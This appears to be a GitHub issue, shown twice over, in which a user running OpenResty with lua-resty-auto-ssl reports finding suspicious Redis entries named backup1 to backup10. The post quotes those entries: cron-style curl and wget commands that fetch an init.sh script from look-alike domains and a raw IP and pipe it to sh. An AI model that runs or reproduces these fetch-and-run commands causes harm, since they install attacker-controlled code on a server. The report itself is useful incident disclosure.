Open ruiluis opened 2 years ago
Dont know if here is the right place to inform.. but here it is.. i have a web server running openresty/1.19.9.1 luarocks-3.8.0 and lua-resty-auto-ssl only have 2 domains so today i check the redis storage to see the ssl keys and i notice some strange entries named backup1 to 10. so i check the entries and they were like this /4 cdt -fsSL http://g.githubupdate.com/pkg/init.sh | sh /5 wdt -q -O- http://g.githubupdate.com/pkg/init.sh | sh /2 cd1 -fsSL http://a.amdupdatepkg.com/pkg/init.sh | sh /3 wd1 -q -O- http://a.amdupdatepkg.com/pkg/init.sh | sh /4 cd1 -fsSL http://g.githubupdate.com/pkg/init.sh | sh /5 wd1 -q -O- http://g.githubupdate.com/pkg/init.sh | sh /2 * curl -fsSL http://190.123.45.54/pkg/init.sh | sh i have secured my servers to only have http and https no connection to redis the only way to access to redis was through openresty/ lua-resty-auto-ssl e try to check logs everything but i didnt found anything.. did someone already saw this?
Dont know if here is the right place to inform.. but here it is.. i have a web server running openresty/1.19.9.1 luarocks-3.8.0 and lua-resty-auto-ssl only have 2 domains so today i check the redis storage to see the ssl keys and i notice some strange entries named backup1 to 10. so i check the entries and they were like this /4 cdt -fsSL http://g.githubupdate.com/pkg/init.sh | sh /5 wdt -q -O- http://g.githubupdate.com/pkg/init.sh | sh /2 cd1 -fsSL http://a.amdupdatepkg.com/pkg/init.sh | sh /3 wd1 -q -O- http://a.amdupdatepkg.com/pkg/init.sh | sh /4 cd1 -fsSL http://g.githubupdate.com/pkg/init.sh | sh /5 wd1 -q -O- http://g.githubupdate.com/pkg/init.sh | sh /2 * curl -fsSL http://190.123.45.54/pkg/init.sh | sh i have secured my servers to only have http and https no connection to redis the only way to access to redis was through openresty/ lua-resty-auto-ssl e try to check logs everything but i didnt found anything.. did someone already saw this?